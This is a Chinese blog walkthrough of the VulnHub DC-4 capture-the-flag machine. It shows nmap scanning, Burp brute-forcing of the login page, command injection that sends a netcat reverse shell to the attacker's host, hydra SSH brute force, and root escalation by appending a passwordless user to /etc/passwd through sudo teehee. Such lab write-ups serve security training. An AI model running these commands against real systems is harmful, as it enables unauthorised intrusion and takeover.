DC-4靶机详情

项目地址

```plain https://download.vulnhub.com/dc/DC-4.zip ```

实验过程

将下载好的靶机导入到VMware中,设置网络模式为NAT模式,然后开启靶机虚拟机

![](https://img-blog.csdnimg.cn/img_convert/f7bd7e20f3d9eaeba464beed29cceb89.png)

使用nmap进行主机发现,获取靶机IP地址

```plain nmap 192.168.47.1-254 ```

根据对比可知DC-4的一个ip地址为192.168.47.145

扫描DC-4的操作系统,端口及对应服务

```plain nmap -A -p- 192.168.47.145 ```

发现开放22和80端口

访问http://192.168.47.145

![](https://img-blog.csdnimg.cn/img_convert/48763b3cfb6b6e985ec0678af08d62b7.png)

发现是个登录界面

尝试使用BP抓包进行爆破

![](https://img-blog.csdnimg.cn/img_convert/558be61e2e44fae476f958fe95f4fef5.png)
发送到Intruder模块
![](https://img-blog.csdnimg.cn/img_convert/1873213081b7dbf208ff47b73891e5a2.png)

载入密码字典,开始攻击
![](https://img-blog.csdnimg.cn/img_convert/eaad272bfcfdfa1abeb1c256711032f1.png)

对lenth进行排序,发现一个长度异常单位

使用这个密码尝试登录
![](https://img-blog.csdnimg.cn/img_convert/1c7479fca344f05a8839af8b49a4ddce.png)

登录成功

漏洞利用

![](https://img-blog.csdnimg.cn/img_convert/353316ef2d281c334d33755d11f79917.png)

发现这里可以执行相关命令

可以考虑使用BP篡改数据包来反弹shell

抓包
![](https://img-blog.csdnimg.cn/img_convert/7e16a952f6905e1012ef7a0d27c2c9e9.png)

发现radio可以修改

设置监听
```plain nc -lvvp 8888 ```

反弹shell
注意原数据包空格用+代替的,所以我们也用+来代替
nc+-e+/bin/bash+192.168.47.129+8888

放包

反弹成功
![](https://img-blog.csdnimg.cn/img_convert/2d7c397005407e67e9dbae31cd4bac67.png)
获得交互式shell
```plain python -c 'import pty;pty.spawn("/bin/bash")' ```

提权

![](https://img-blog.csdnimg.cn/img_convert/f839d5a676c8e1e010763c6660360a93.png)
四处翻翻
![](https://img-blog.csdnimg.cn/img_convert/96fd5a190f9044b4593b61b90bf954ff.png)

翻到一份密码字典

一个没权限查看的文件

复制一份内容写进password.txt文件中
![](https://img-blog.csdnimg.cn/img_convert/1aa5979762d75c441783b7b83f131d87.png)
使用hydra命令进行爆破
```plain hydra -l jim -P password.txt -t 1 -vV -e ns 192.168.47.145 ssh -o ssh.txt -f ssh://192.168.47.145 ```

爆破出来密码是jibril04

使用ssh连接
![](https://img-blog.csdnimg.cn/img_convert/761f7b12e67d969c6630c2eb3210f79b.png)

连接成功

尝试查看刚才没权限的那个文件
```plain cat /home/jim/mbox ```

看上去像是收到一封邮件

去var/mail找找
```plain cat /var/mail/jim ```

通过文件内容得到了charles的密码^xHhA&hvim0y

登录charles账户
![](https://img-blog.csdnimg.cn/img_convert/b6faf6e044b450bb1232dce1bef9baac.png)

登录成功

查看权限
![](https://img-blog.csdnimg.cn/img_convert/eb3fc38783093eb130b00a287ca591c8.png)

发现charles有teehee命令的权限

使用teehee创建一个root用户
```plain echo "huacha::0:0:::/bin/sh" | sudo teehee -a /etc/passwd ```

添加成功

切换账户
![](https://img-blog.csdnimg.cn/img_convert/0c26c4394b5316c7b353ceb2c06eb38e.png)

发现flag.txt在/root目录下

查看flag
![](https://img-blog.csdnimg.cn/img_convert/4c04a2502d8f369b74841e6c5bfb4287.png)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值